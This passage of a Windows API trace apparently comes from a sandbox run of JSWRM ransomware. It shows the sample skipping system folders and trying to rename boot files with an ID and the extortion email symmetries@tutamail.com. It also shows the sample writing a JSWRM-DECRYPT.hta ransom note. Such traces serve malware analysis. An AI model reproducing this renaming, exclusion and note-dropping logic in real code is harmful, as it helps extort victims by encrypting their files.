lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.074] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.075] CloseHandle (hObject=0xffffffff) returned 1 [0064.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0064.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0064.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0064.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0064.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.075] MoveFileW (lpExistingFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.075] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cda66b4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cda66b4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cda66b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.075] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.076] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.076] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.076] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.077] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.077] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0064.077] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.077] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.078] CloseHandle (hObject=0xffffffff) returned 1 [0064.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0064.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0064.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.078] MoveFileW (lpExistingFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\pl-PL\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.078] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.078] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.078] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0064.078] lstrcmpiW (lpString1="pt-BR", lpString2=".") returned 1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="..") returned 1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="...") returned 1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="windows") returned -1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="recovery") returned -1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="perflogs") returned 1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="documents and settings") returned 1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="$RECYCLE.BIN") returned 1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="system volume information") returned -1 [0064.079] lstrcmpiW (lpString1="pt-BR", lpString2="msocache") returned 1 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0064.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.079] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pt-br\\jswrm-decrypt.hta")) returned 0xffffffff [0064.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0064.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0064.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.079] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pt-br\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.080] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.080] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.081] CloseHandle (hObject=0x450) returned 1 [0064.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0064.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.082] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pt-br\\jswrm-decrypt.hta")) returned 0x20 [0064.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.083] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cda66b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0064.083] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.083] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cda66b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.083] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.083] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.083] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.083] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0064.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0064.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0064.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0064.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: 